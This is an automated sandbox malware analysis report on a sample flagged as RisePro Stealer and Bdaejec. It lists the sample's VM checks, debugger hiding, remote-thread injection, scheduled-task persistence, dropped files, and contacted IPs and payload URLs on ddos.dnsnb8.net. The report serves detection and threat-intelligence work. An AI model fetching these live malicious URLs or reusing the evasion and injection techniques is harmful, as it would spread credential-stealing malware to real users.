Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*QH
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: VMWare
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: MPGPH131.exe, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457918571.00000000006D2000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457880519.0000000000A22000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe API call chain: ExitProcess graph end node

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01092014
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 0_2_00FCA100
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01ADA044 mov eax, dword ptr fs:[00000030h] 0_2_01ADA044
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FC4AB0 mov eax, dword ptr fs:[00000030h] 0_2_00FC4AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0109A044 mov eax, dword ptr fs:[00000030h] 7_2_0109A044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_00584AB0 mov eax, dword ptr fs:[00000030h] 7_2_00584AB0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0109A044 mov eax, dword ptr fs:[00000030h] 8_2_0109A044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_00584AB0 mov eax, dword ptr fs:[00000030h] 8_2_00584AB0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FBA400 GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree, 0_2_00FBA400
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01092014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01092014
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0108DADD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00652014
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_0064DADD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_00652014 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00652014
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064DADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_0064DADD

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 0_2_00FCA100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 7_2_0058A100
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0058A100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 8_2_0058A100
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
Source: SciTE.exe.1.dr Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW, 0_2_010AD930
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: EnumSystemLocalesW, 0_2_010A49BA
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: EnumSystemLocalesW, 0_2_010AD9D7
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_010AE0A0
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_010ADB48
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: EnumSystemLocalesW, 0_2_010ADA22
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: EnumSystemLocalesW, 0_2_010ADABD
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW, 0_2_010ADD9B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoA, 0_2_01898D69
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_010AD72B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW, 0_2_010A4F3D
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW, 0_2_010ADFCA
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_010ADEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_0066E0A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 7_2_0066D930
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 7_2_0066D9D7
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 7_2_006649BA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 7_2_0066DA22
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 7_2_0066DABD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_0066DB48
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 7_2_0066DD9B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_0066DEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 7_2_0066D72B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 7_2_00664F3D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 7_2_0066DFCA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_0066E0A0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 8_2_0066D930
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 8_2_0066D9D7
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 8_2_006649BA
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 8_2_0066DA22
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: EnumSystemLocalesW, 8_2_0066DABD
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_0066DB48
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 8_2_0066DD9B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_0066DEC4
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 8_2_0066D72B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 8_2_00664F3D
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: GetLocaleInfoW, 8_2_0066DFCA
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108CCDC GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime, 0_2_0108CCDC
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_7ECA1E80 GetUserNameA, 0_2_7ECA1E80
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E6139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 1_2_00E6139F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.1.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bdaejec
Source: Yara match File source: Process Memory Space: jHYZko.exe PID: 6484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jHYZko.exe PID: 2516, type: MEMORYSTR
Yara detected RisePro Stealer
Source: Yara match File source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lisect_AVT_24003_G1A_89.exe PID: 4912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 3692, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 1716, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481168 Sample: Lisect_AVT_24003_G1A_89.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 55 ddos.dnsnb8.net 2->55 61 Multi AV Scanner detection for domain / URL 2->61 63 Antivirus detection for URL or domain 2->63 65 Antivirus detection for dropped file 2->65 67 11 other signatures 2->67 9 Lisect_AVT_24003_G1A_89.exe 1 10 2->9         started        14 MPGPH131.exe 2 2->14         started        16 RageMP131.exe 2 2->16         started        18 MPGPH131.exe 2 2->18         started        signatures3 process4 dnsIp5 59 193.233.132.62, 49705, 49708, 49709 FREE-NET-ASFREEnetEU Russian Federation 9->59 47 C:\Users\user\AppData\Local\Temp\jHYZko.exe, PE32 9->47 dropped 49 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 9->49 dropped 51 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 9->51 dropped 53 2 other malicious files 9->53 dropped 77 Detected unpacking (changes PE section rights) 9->77 79 Contains functionality to check for running processes (XOR) 9->79 81 Contains functionality to inject threads in other processes 9->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 9->83 20 jHYZko.exe 18 9->20         started        25 schtasks.exe 1 9->25         started        27 schtasks.exe 1 9->27         started        85 Antivirus detection for dropped file 14->85 87 Multi AV Scanner detection for dropped file 14->87 89 Machine Learning detection for dropped file 14->89 91 Found stalling execution ending in API Sleep call 14->91 93 Hides threads from debuggers 16->93 29 jHYZko.exe 27 16->29         started        file6 signatures7 process8 dnsIp9 57 ddos.dnsnb8.net 44.221.84.105, 49704, 49706, 49707 AMAZON-AESUS United States 20->57 41 C:\Program Files\7-Zip\Uninstall.exe, PE32 20->41 dropped 43 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 20->43 dropped 45 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 20->45 dropped 69 Antivirus detection for dropped file 20->69 71 Multi AV Scanner detection for dropped file 20->71 73 Detected unpacking (changes PE section rights) 20->73 75 2 other signatures 20->75 31 WerFault.exe 19 16 20->31         started        33 conhost.exe 25->33         started        35 conhost.exe 27->35         started        37 cmd.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 37->39         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
44.221.84.105
 ddos.dnsnb8.net United States
14618 AMAZON-AESUS false
193.233.132.62
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false

Contacted Domains

Name IP Active
ddos.dnsnb8.net 44.221.84.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar true
  • URL Reputation: malware
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k2.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k5.rar true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k1.rar true
  • URL Reputation: malware
 unknown
http://ddos.dnsnb8.net:799/cj//k4.rar true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown